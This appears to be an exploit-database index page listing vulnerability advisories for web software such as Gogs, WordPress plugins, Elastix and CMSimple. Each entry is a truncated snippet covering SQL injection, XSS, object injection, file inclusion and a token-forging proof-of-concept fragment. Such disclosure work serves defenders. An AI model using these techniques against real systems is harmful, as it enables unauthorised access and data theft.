YourMembers Blind SQL Injection Vulnerability

The YourMembers plugin suffers from a remote blind SQL injection vulnerability. Vulnerability title: Blind SQL Injection Vulnerability in YourMembers plugin CVE: N/A Vendor: YourMembers plugin Product: https://github.com/YourMembers/yourmembers/tree/master/ymtrunk Affected version: Version 3, 29...

CVE-2014-8683 XSS in Gogs Markdown Renderer

-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 XSS in Gogs Markdown Renderer ============================= Researcher: Timo Schmid [email protected] Description =========== GogsGo Git Service is a painless self-hosted Git Service written in Go. taken from 1 It is very similiar to the github...

CVE-2014-8682 Multiple Unauthenticated SQL Injections in Gogs

-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Unauthenticated SQL Injection in Gogs repository search ======================================================= Researcher: Timo Schmid [email protected] Description =========== GogsGo Git Service is a painless self-hosted Git Service written in Go...

汇文手机图书馆不用密码获取用户信息

简要描述： 生成认证token，只用用户名即可获取用户信息 详细说明： 将用于认证的token的生成方式在客户端实现且生成方式与密码无关 影响院校列表 http://www.libsys.com.cn/huiwenappcenter2.php 漏洞证明： import java.io.UnsupportedEncodingException; import java.math.BigInteger; / Created by snail on 14-11-23. / public class LibToken public static String makeTokenString s...

OpenPNE 3.8.9 PHP Object Injection Vulnerability

Exploit for php platform in category web applications OpenPNE getRequest-getHost; if $value = sfContext::getInstance-getRequest-getCookie$key $value = unserializebase64decode$value; return $value; User input passed through cookies is not properly sanitized before being used in an unserialize call...

Gogs Blind SQL Injection Vulnerability

Exploit for php platform in category web applications Blind SQL Injection in Gogs label search ======================================== Researcher: Timo Schmid Description =========== GogsGo Git Service is a painless self-hosted Git Service written in Go. taken from 1 It is very similiar to the...

Gogs Repository Search SQL Injection

-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Unauthenticated SQL Injection in Gogs repository search ======================================================= Researcher: Timo Schmid Description =========== GogsGo Git Service is a painless self-hosted Git Service written in Go. taken from 1 I...

Elastix 2.4.0 Stable XSS / CSRF / Command Execution

Title: Elastix Multiple vulnerabilities Remote Command Execution, XSS, CSRF Author: Simo Ben youssef Contact: SimoatMorxploitcom Discovered: September 1 2014 Published: October 17 2014 MorXploit Research http://www.MorXploit.com Software: Elastix Version: Elastix 2.4.0 Stable Vendor url:...

SOL15699 - Linux kernel vulnerability CVE-2014-0131

The affected versions ship with vulnerable code; however, the vulnerability is unlikely to be exploited as BIG-IP, BIG-IQ, and EM systems do not load the vhost-net drivers. Recommended Action If the previous table lists a version in the Versions known to be not vulnerable column, you can eliminat...

YourMembers Blind SQL Injection

Vulnerability title: Blind SQL Injection Vulnerability in YourMembers plugin CVE: N/A Vendor: YourMembers plugin Product: https://github.com/YourMembers/yourmembers/tree/master/ymtrunk Affected version: Version 3, 29 June 2007 https://github.com/YourMembers/yourmembers/blob/master/LICENSE Google...

Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

No description provided by source. Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://huge-it.com/ Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip Mirror Link :...

WordPress Plugin Huge-IT Image Gallery 1.0.1 - (Authenticated) SQL Injection

Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://huge-it.com/ Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip Mirror Link :...

CMSimple 4.4.4 RFI / Code Execution / Default Password

Exploit Title : CMSimple 4.4.4 various security vulnerability Author : Govind Singh aka NullPort Vendor : http://cmsimple.org/ Download Link : http://www.cmsimple.org/downloadcounter/dlcount/count.php?id=31 Date : 26/07/2014 Discovered at : IHT Lab 1ND14N H4X0R5 T34M Love to : Manish Tanwar,...

Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/ Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip...

phpShop <= 0.8.1 - Remote SQL injection / Filter Bypass Vulnerabilities

No description provided by source. Vendor : PHPShop Webiste : http://www.phpshop.org Version : v0.8.1 Author: the redc0ders / theredc0dersatgmaildotcom Condition: magicquotegpc = off , in php.ini setting Details : ========== Vulnerable Code in index.php near lines 98 - 128 code // basic SQL injec...

Joomla Community Builder Enhenced (CBE) Component LFI/RCE Vulnerability

No description provided by source. Description: Joomla CBE suffers from a local file inclusion vulnerability. As CBE also offers file uploading functionality that allows to upload files that contain php-code, this can be used to execute arbitary system-commands on the host with the webservers...

BtiTracker <= 1.4.1 (become admin) Remote SQL Injection Vulnerability

No description provided by source. BtiTracker =v1.4.1 Remote SQL Injection Exploit Discovered by: m@ge|ozz - [email protected] Vulnerabitity: Remote Sql Injection / Problem: Any user can be Administrator Website Vendor: http://www.btiteam.org Vulnerable Code accountchange.php: if isset$GETstyle...

Facebook Profile MyBB Plugin 2.4 - Persistant XSS

No description provided by source. Exploit Title: MyBB Facebook Profile Plugin Persistant XSS Date: 12/12/2012 Exploit Author: limb0 Vendor Homepage: http://www.collectiontricks.it/ Software Link: http://mods.mybb.com/view/facebook-profile-link-on-postbit-2-2 Version: 2.4 Tested on: Linux P-XSS...

WordPress GD Star Rating plugin <= 1.9.10 SQL Injection

No description provided by source. Exploit Title: WordPress GD Star Rating plugin = 1.9.10 SQL Injection Vulnerability Date: 2011-09-26 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/gd-star-rating.zip Version: 1.9.10 tested Not...

PHPsFTPd 0.2/0.4 Inc.Login.PHP Privilege Escalation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/14222/info PHPsFTPd is affected by a privilege escalation vulnerability. PHPsFTPd is affected by a privilege escalation vulnerability. This issue is due to a failure in 'inc.login.php' when processing login credentials. A...